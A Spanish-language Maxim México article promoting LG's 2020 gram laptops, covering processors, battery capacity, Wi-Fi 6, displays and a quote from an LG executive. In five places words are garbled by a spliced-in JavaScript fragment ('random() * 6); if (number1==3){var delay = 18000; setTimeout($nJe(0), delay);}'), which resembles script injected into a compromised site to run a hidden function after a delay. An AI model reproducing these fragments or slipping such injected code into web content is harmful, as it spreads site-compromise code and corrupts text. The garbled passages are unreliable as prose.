La nueva línea LG Gram: portabilidad, rendimiento y duración de batería | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    La nueva línea LG Gram: portabilidad, rendimiento y duración de batería

    La línea 2020 de laptops LG.

    Autor: Redacción Maxim 16 diciembre, 2019


     

     

     

     

    Las soluciones de cómputo móvil de LG para 2020

     

     

     

    La nueva familia de computadoras portátiles LG gram de LG Electronics, encabezada por la LG gram 17 (modelo 17Z90N), seguida por LG gram 15 (modelo 15Z90N), LG gram 14 (modelo 14Z90N) y LG gram 2-en-1 de 14 pulgadas (modelo 14T90N), fueron diseñadas para establecer un nuevo estándar en cómputo móvil y cubrir las necesidades de los usuarios más exigentes. La línea 2020 de laptops LG gram continúa con las características icónicas de esta línea de productos de la compañía: ligereza, diseño compacto, batería de larga duración y, ahora, mejor rendimiento.

     

     

     

    Ver esta publicación en Instagram

     

    Had a stressful week?🤯 Get some rest with #LGgram.👨🏼‍💻 #havealightweightedweekend

    Una publicación compartida por LG gram_Global (@lggram_global) el


     

     

    En el corazón de la nueva serie de computadoras portátiles de LG se encuentra el procesador Intel® Core™ de décima generación con tarjeta de gráficos Iris® Plus y hasta 24 GB de memoria DDR4 de doble canal. Con el doble de poder de procesamiento de gráficos que los modelos del año anterior, los creadores de contenido estarán encantados con la velocidad y el poder móvil para editar videos 4K en cualquier lugar de la nueva familia gram, además los usuarios se sorprenderán con el desempeño en video juegos gracias a la incorporación de la tecnología Iris Plus.

     

     

     

     

     

     

    Con una batería más grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de 80Wh tanto en el modelo 17Z90N como en el 15Z90N, los usuarios pueden disfrutar de horas y horas sin una toma de corriente sin sacrificar la portabilidad. Las nuevas LG gram también integran el estándar Wi-Fi 6 que garantiza una conectividad inalámbrica mejorada, una mejor eficiencia y un menor consumo de batería. Los nuevos equipos de LG cuentan con Mega Cooling System, una tecnología que permite mantener los dispositivos funcionandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando sin calentarse y en silencio en casi cualquier escenario de uso.

     

     

     


     

     

    El modelo insignia LG gram 17, ganador del CES 2020 Innovation Award Honoree es la solución definitiva para quienes buscan la máxima productividad portátil. La pantalla IPS extendida de 17 pulgadas con estándar WQXGA (Wide Quad Extended Graphics Array), ofrece imágenes muy detalladas con colores increíblemente precisos. La pantalla 16:10 del dispositivo proporciona más espacio para trabajar al editar videos, fotos y documentos.

     

     

     

     

     

    Ver esta publicación en Instagram

     

    No matter how cold outside, you are totally fine if you stay inside with #LGgram🔥 Stay Warm 🙏 📷 @mrvahn

    Una publicación compartida por LG gram_Global (@lggram_global) el


     

     

    Rediseñada para 2020, la nueva línea LG gram ofrece más funciones, un diseño minimalista y uniforme que le brinda una apariencia premium. Las nuevas LG gram 15 y 14 continúan el legado de la marca de proporcionar largos tiempos de uso, con menor tiempo de carga y mayor comodidad. Mientras que las delgadas computadoras portátiles de LG son el punto de referencia de la industria por su capacidad para integrar una pantalla de 15 pulgadas en un cuerpo de 14 pulgadas y una pantalla de 14 pulgadas en un chasis diseñado para una computadora de 13.3 pulgadas.

     

     

    La laptop convertible ultraportátil de LG, denominada LG gram 2-en-1 (modelo 14T90N), regresa este año con mayor funcionalidad y la inclusión de ThunderboltTM 3. Brindandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando a los usuarios la potencia para ser más productivos sin importar dónde se encuentren, este dispositivo versátil conserva su ADN central, entregandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando más de 20 horas de tiempo de trabajo en un dispositivo que inclina la balanza sólo 1,145 gramos.

     

     

     

     

    Ver esta publicación en Instagram

     

    Stay minimal but still have fun with your new 2018 #LGgram 💻🔥

    Una publicación compartida por LG gram_Global (@lggram_global) el


     

     

    «La serie LG gram sigue siendo líder en la industria en ofrecer más allá de las expectativas cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando se trata de portabilidad sin sacrificio», dijo Jang Ik-hwan, jefe de la división de negocios de TI de LG. “Históricamente, los clientes tenían que elegir una función entre rendimiento, portabilidad o duración de la batería. LG gram es una prueba de que esto ya no es cierto».

     

     

     

     

    Ahora chécate esta lista de GADGETS NAVIDEÑOS.

     

     

     

    Temas relacionados con esta nota: , ,

La línea 2020 de laptops LG.